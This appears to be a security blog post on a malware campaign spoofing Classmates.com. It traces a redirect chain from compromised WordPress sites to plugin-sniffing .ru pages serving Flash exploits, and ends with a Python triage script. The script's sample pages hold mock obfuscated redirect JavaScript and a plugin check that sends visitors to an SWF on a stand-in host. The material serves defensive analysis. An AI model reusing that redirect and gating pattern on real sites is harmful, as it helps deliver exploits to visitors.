Classmates.com has become the latest in a series of well-known brands to be abused by a particular gang of malware distributors. The similarities to other outbreaks include:
- Linking to multiple compromised legitimate sites, which then redirect to the malware-hosting sites
- Favoring WordPress sites that can be exploited to host the redirect script
- Hosting the malware on various .ru domains
- Showing simple messages on the malware page such as “Please Wait – Loading” (black text on white)
- Using the same Flash exploits in the malware
The Classmates.com email thanks the recipient for joining and provides links to confirm the registration or correct the details.
Once again the initial link points to a compromised WordPress site. A script hidden on this site dynamically builds the redirect URL (so the destination never appears as a plain string in the page source) and sends the visitor to a forum site. There, a second script embedded in a forum post directs to the final .ru domain, which displays the expected “Loading” message. This “double-hop” is a slight change from the previous attacks in this series.
The landing page on the final site checks which Adobe Reader (PDF) and Flash versions are installed on the visitor's PC.
- If a version it can exploit is found, it redirects to a malicious SWF (Flash) file.
- If not, it redirects to google.de, so a visitor without the targeted plugin versions sees nothing more than a bounce to Google. The same applies to analysis: a sandbox or replay that does not expose a suitable Flash or Reader version will be sent to google.de and never see the payload.
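The following is an added triage script, not code from the original post or from the campaign: it reconstructs a redirect chain of the kind described above (compromised WordPress site to forum post to .ru landing page) from captured responses, and stops at the first page that fingerprints browser plugins, reporting the SWF and fallback targets that page can redirect to. Every URL and page body below is constructed for the example; the redirect and plugin-sniffing patterns are assumptions about what such scripts look like, and the string folding only resolves literal concatenation of single-level `var` assignments, so heavier obfuscation would need an instrumented browser instead.

```python
import re
from urllib.parse import urljoin, urlparse

# Redirect forms used along the chain: a script assigning location (possibly
# built from concatenated string variables), a meta refresh, or an iframe.
LOCATION_RE = re.compile(
    r'(?:window\.|document\.|top\.|self\.)?\blocation(?:\.href)?\s*=(?!=)\s*([^;]+);',
    re.I)
VAR_RE = re.compile(r'\bvar\s+(\w+)\s*=\s*(["\'])(.*?)\2\s*;')
META_RE = re.compile(
    r'<meta[^>]+http-equiv=["\']?refresh["\']?[^>]+content=["\']?\d+\s*;\s*url=([^"\'>\s]+)',
    re.I)
IFRAME_RE = re.compile(r'<iframe[^>]+src=["\']([^"\']+)["\']', re.I)
# Assumed markers of the final stage's plugin version check.
SNIFF_RE = re.compile(r'navigator\.plugins|Shockwave Flash|Adobe Acrobat|ActiveXObject', re.I)
WP_RE = re.compile(r'/wp-(?:content|includes)/')


def fold_expression(expr, variables):
    """Fold '"a" + b + \'c\'' into one string using single-level var assignments.
    Returns None if any piece is neither a literal nor a known string variable."""
    out = []
    for piece in expr.split('+'):
        piece = piece.strip()
        m = re.fullmatch(r'(["\'])(.*)\1', piece)
        if m:
            out.append(m.group(2))
        elif piece in variables:
            out.append(variables[piece])
        else:
            return None
    return ''.join(out)


def extract_redirects(base_url, body):
    """Statically pull every redirect target out of one captured response."""
    variables = {name: val for name, _q, val in VAR_RE.findall(body)}
    targets = [m.group(1) for m in META_RE.finditer(body)]
    targets += [m.group(1) for m in IFRAME_RE.finditer(body)]
    for m in LOCATION_RE.finditer(body):
        folded = fold_expression(m.group(1), variables)
        if folded:
            targets.append(folded)
    return [urljoin(base_url, t) for t in targets]


def walk_chain(start_url, fetch, max_hops=10):
    """Follow captured responses hop by hop until the chain ends or a page starts
    fingerprinting plugins. fetch(url) returns a body or None. Returns
    (hops, candidates, gated): hops is a list of (url, body); candidates are the
    gated page's possible targets when gated is True."""
    hops, url = [], start_url
    for _ in range(max_hops):
        body = fetch(url)
        if body is None:
            break
        hops.append((url, body))
        if SNIFF_RE.search(body):
            return hops, extract_redirects(url, body), True
        nxt = extract_redirects(url, body)
        if not nxt:
            break
        url = nxt[0]
    return hops, [], False


def triage(start_url, fetch):
    """Summarise the chain: hop count, WordPress hops, .ru landing, gate targets."""
    hops, candidates, gated = walk_chain(start_url, fetch)
    urls = [u for u, _ in hops]
    final_host = urlparse(urls[-1]).hostname or ''
    is_swf = lambda c: urlparse(c).path.lower().endswith('.swf')
    return {
        'chain': urls,
        'hop_count': len(urls) - 1,
        'wordpress_hops': [u for u, b in hops if WP_RE.search(b)],
        'final_host_ru': final_host.endswith('.ru'),
        'plugin_gate': gated,
        'swf_targets': [c for c in candidates if is_swf(c)],
        'fallback_targets': [c for c in candidates if not is_swf(c)],
    }


# Constructed stand-in for the three captured responses (not real captures).
SAMPLE_START = 'http://blog.wp-victim.test/2011/03/post/'
SAMPLE_PAGES = {
    SAMPLE_START: (
        '<html><head><link rel="stylesheet" href="/wp-content/themes/t/style.css">'
        '</head><body><p>Welcome</p><script>var h="http://";'
        'var d="forum.victim.test";var p="/showthread.php?t=7";'
        'window.location.href = h + d + p;</script></body></html>'),
    'http://forum.victim.test/showthread.php?t=7': (
        '<html><body><div class="post">nice thread<script>'
        'document.location = "http://landing.example.ru/index.php?id=2";'
        '</script></div></body></html>'),
    'http://landing.example.ru/index.php?id=2': (
        '<html><body>Please Wait - Loading<script>'
        'var f = navigator.plugins["Shockwave Flash"];'
        'if (f && f.description.indexOf("10.") != -1) {'
        ' window.location = "http://landing.example.ru/x.swf"; }'
        ' else { window.location = "http://google.de"; }'
        '</script></body></html>'),
}


def fetch_sample(url):
    return SAMPLE_PAGES.get(url)


if __name__ == '__main__':
    for key, value in triage(SAMPLE_START, fetch_sample).items():
        print(f'{key}: {value}')
```

Because the walker stops at the plugin-sniffing page instead of picking one of its two targets, both the SWF and the google.de fallback are reported, which is the information a replay environment needs: unless it presents a Flash or Reader version the gate accepts, only the fallback will ever be observed.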